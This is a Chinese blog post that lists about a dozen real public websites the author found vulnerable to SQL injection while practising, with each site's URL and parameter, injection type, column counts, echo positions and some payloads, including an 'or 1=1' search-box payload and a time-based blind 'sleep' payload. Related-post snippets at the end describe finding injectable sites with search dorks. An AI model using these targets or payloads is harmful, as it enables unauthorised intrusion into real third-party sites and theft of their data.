存在sql注入的公网站点

已于 2024-11-01 08:00:50 修改
阅读量891 收藏 11
点赞数 6
文章标签: sql 数据库
于 2024-11-01 07:58:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/h1008685/article/details/143422119
版权

此数据为博主在新手阶段练习sql注入时发现的站点,漏洞可能修复,备注可能错误

url: https://www.uni-1.com.hk/about_en.php?id=2
注入点类型:数值
sql报错回显:无
sql语句执行:[order by] [union]
字段数:14
回显点:12,13,14


url: https://atmos.mora.com.pl/blank.php?id=19088
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
回显点:1,2,3
用户权限:低

https://www.csi-india.org/news/index.php?id=18
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
字段数:8
回显点:3,4,5,6

http://jwsm.cc/blank.php?id=136
注入点类型:num
sql报错回显:无
权限:普通

https://esjindex.org/search.php?id=2
注入点类型:字符 
异常载荷:' 
sql报错回显:存在
字段:22
union联合查询失效
sleep判断失效

http://www.qdbohai.com/project/list.php
注入点类型:搜索框
传参类型:post传参
输出[all]载荷:keywords=aaaa' or 1=1--+

https://www.sunchampion.com/about.php?id=41
注入点类型:数值
传参类型:get
sql报错回显:存在
回显点:存在
sql报错盲注载荷:exreactvalue

url:https://www.zenith.edu.hk/tc/school.php?id=35
注入点:id=35
类型:str
sql报错回显:存在
页面回显:无,页面自动跳转
sql报错盲注载荷:exreactvalue
comment:union非法混合,

url:https://abp.bzh/article.php?id=31347
类型:str
sql报错回显:存在
页面回显:无
注入方式:sleep延时盲注
comment:order by失效,union失效
盲注载荷:' and if((length(database()))=13,sleep(0),sleep(5)) --+

url:https://www.ciritas.ru/faq2.php?id=2
类型:str

url:https://uppo.pt/announce.php?id=136
类型:str
sql报错回显:无
字段数:19
comment:union失效,403

url:https://www.spbigbag.com/news_view.php?id=1
类型:str

Zeddm
关注
ERPNext SQL 注入漏洞复现
0xSec
12-05 1120
ERPNext frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
东胜物流软件 多处 SQL注入漏洞复现
0xSec
11-27 1426
东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting、/Shipping/CompanysAccountGridSource.aspx、/FeeCodes/OPERATORCODEAdapter.aspx、/FeeCodes/SubCompSeaeDefAdapter.aspx等接口处存在 SQL 注入漏洞
寻找sql注入网站的方法(必看)
01-21
方法一:利用google高级搜索,比如搜索url如.asp?id=9如下所示: (说明:后缀名为PHP的类似)   方法二:利用百度的高级搜索也可以,比如搜索url如.asp?id=9如下所示: (说明:后缀名为php的类似)   以上这篇寻找sql注入网站的方法(必看)就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持软件开发网。 您可能感兴趣的文章:Java面试题解析之判断以及防止SQL注入SQL注入原理与解决方法代码示例通过ibatis解决sql注入问题Win2003服务器防SQL注入神器–D盾_IIS防火墙
实战真实网站SQL注入
qq_55376995的博客
12-24 7668
某建设投资集团股份有限公司网站存在SQL注入一、发现过程1.使用百度语法寻找可能存在SQL注入网站:inurl:?id=12.发现一个网站进去看看3.尝试手工注入:?id=1106'?id=1106-1?id=1106-24.发现页面发生变化,可能存在SQL注入二、漏洞利用1.这里使用sqlmap进行注入检测表:​检测字段:检测数据:4.然后跑出用户名和密码,但密码是加密过的,我用MD5解密最后得出。
网站篡改入门,一个SQL注入漏洞就能让整个网站大变样,原理详解!从SQL注入到XSS攻击,完整还原黑客是如何篡改网站
最新发布
Cairo_A的博客
04-03 583
通过 SQL 注入和 XSS 漏洞,我们可以实现对网站内容的篡改。在实际测试中,手动操作更能帮助您理解漏洞原理,提升技术水平。
SQL注入网站入侵实例
得峰的专栏 [网络收藏]
05-04 1801
这几天闲得无聊,想上网Down几部电影来看,找了找都是要Money的,不爽,花时间跑去汇钱还不如找个有漏洞的黑一黑。于是,计划开始:(为避免不必要的误会,网址、用户名、密码做了一些修改,不过方法是100%原汁原味)  1.寻找入口  准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。  尝试几个有传入参数的页面,逐个测试是否有SQL
UC某网站SQL注射漏洞
swordheart的博客
04-15 1811
漏洞详情 披露状态: 2010-07-26: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-25: 细节向公众公开 简要描述: UC某网站存在SQL注射漏洞。 详细说明: wap网站中的 http://wap.uc.cn/ucpack/dlmobile/control/generic_p
Love-Yi情侣网站3.0存在SQL注入漏洞
记录开发和安全学习过程中的点点滴滴
06-03 2615
Love-Yi情侣网站3.0存在SQL注入漏洞 是一个基于php框架和爱情主题的表白网站。经个人修改和设计更加美观好看,适合哄女朋友开心。本次测试也是对自己手法的一次测试,虽然没有进行绕过,但是还是对于信息收集的思路有了更进一步的提升,测试很有趣,休息的时候玩玩也不错,继续加油。
【无标题】SpringBlade error/list SQL 注入漏洞
2301_80127209的博客
06-19 703
SpringBlade框架后台/api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
泛微E-Office SQL注入漏洞复现
0xSec
11-28 2092
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
九思OA workflowSync.getUserStatusByRole.dwr SQL注入漏洞复现
0xSec
11-27 451
北京九思协同办公软件 /jsoa/workflow/dwr/exec/workflowSync.getUserStatusByRole.dwr接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL注入的一个ASP网站源码
12-29
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
SQL注入测试平台 SQLol -2.SELECT注入测试
05-23 375
前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试。 一条完成Select语句,大致可以这样表示: SELECT 【username】 FROM 【users】 WHERE username = 【'1'】 GROUP BY 【u...
3-1SQL注入网站实例:注入步骤
小王的储物间
03-20 2028
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
web十大漏洞--sql注入
m0_71907084的博客
10-30 1664
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 1065
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
网站SQL注入
野生码农
01-24 2223
JSP注入攻击tomcat服务器小案例 https://blog.youkuaiyun.com/u012881836/article/details/51242641   原理 上传一个可以执行的jsp文件,然后打开这个文件。这个文件里,可以写一些代码,执行一些特殊操作。       jsp mysql 注入攻击实例 https://blog.youkuaiyun.com/judyge/article/...
长亭雷池waf+小皮
10-19
根据提供的引用内容,长亭雷池WAF是一款Web应用程序防火墙,可以保护Web应用程序免受各种攻击,如SQL注入、跨站点脚本攻击等。而小皮是一款内网穿透工具,可以将内网服务暴露到公网上,使得外网用户可以访问内网服务。在使用小皮时,可以通过配置frpc来实现HTTP接收,并且可以使用长亭雷池WAF来保护内网服务免受攻击。需要注意的是,在使用WAF时,应该避免使用SSL加密,因为这可能会导致WAF无法获取客户端真实地址并报错。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值